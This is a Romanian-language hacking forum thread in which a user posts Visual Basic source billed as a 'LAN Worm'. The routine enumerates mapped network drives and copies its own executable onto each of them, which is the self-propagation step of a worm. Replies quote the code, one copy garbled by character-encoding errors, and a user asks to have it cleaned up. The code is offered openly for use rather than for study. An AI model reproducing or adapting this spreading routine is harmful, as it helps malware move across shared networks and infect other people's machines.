Jump to content
Icarius

[source code VB] LAN Worm

Recommended Posts

Aceasta subrutina multiplica executabilul in folderele de pe retea ;)

Daca aveti alte intrebari nu ezitati sa ma contactati ;)

Credits: ICARIUS

Public Sub LocalNetwork()

On Error Resume Next



Dim A, B, C

Set A = CreateObject("WScript.Network")

Set B = A.EnumNetworkDrives



If B.Count <> 0 Then

   For C = 0 To B.Count - 1

       If InStr(B.Item(C), "") <> 0 Then

           FileCopy App.Path & "" & App.EXEName & ".exe", B.Item(C)

       End If

   Next

End If



End Sub

Link to comment
Share on other sites

<div class='quotetop'>QUOTE("icarius")</div>

pai codul asta il pui intr-un program  :@  

daca nu stii VB nu prea te ajuta cu nimica. o sa pun in curand niste tutoriale VB pentru incepatori si pentru avansati  :P

ok ms mult . Sper ca vorbesti de Visual Basic ca mai ma descurc si eu prin el :@

Link to comment
Share on other sites

Daca aveti alte intrebari nu ezitati sa ma contactati ;)

ÂÂÂÂ* ÂÂÂÂ*For C = 0 To B.Count - 1

ÂÂÂÂ* ÂÂÂÂ* ÂÂÂÂ* ÂÂÂÂ*If InStr(B.Item©, "") <> 0 Then

ÂÂÂÂ* ÂÂÂÂ* ÂÂÂÂ* ÂÂÂÂ* ÂÂÂÂ* ÂÂÂÂ*FileCopy App.Path & "" & App.EXEName & ".exe", B.Item©

ÂÂÂÂ* ÂÂÂÂ* ÂÂÂÂ* ÂÂÂÂ*End If

ÂÂÂÂ* ÂÂÂÂ*Next

Decripteaza asta te rog, vreau VB pur si nu criptografie, ca sa pot intelege.

Multumesc !

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...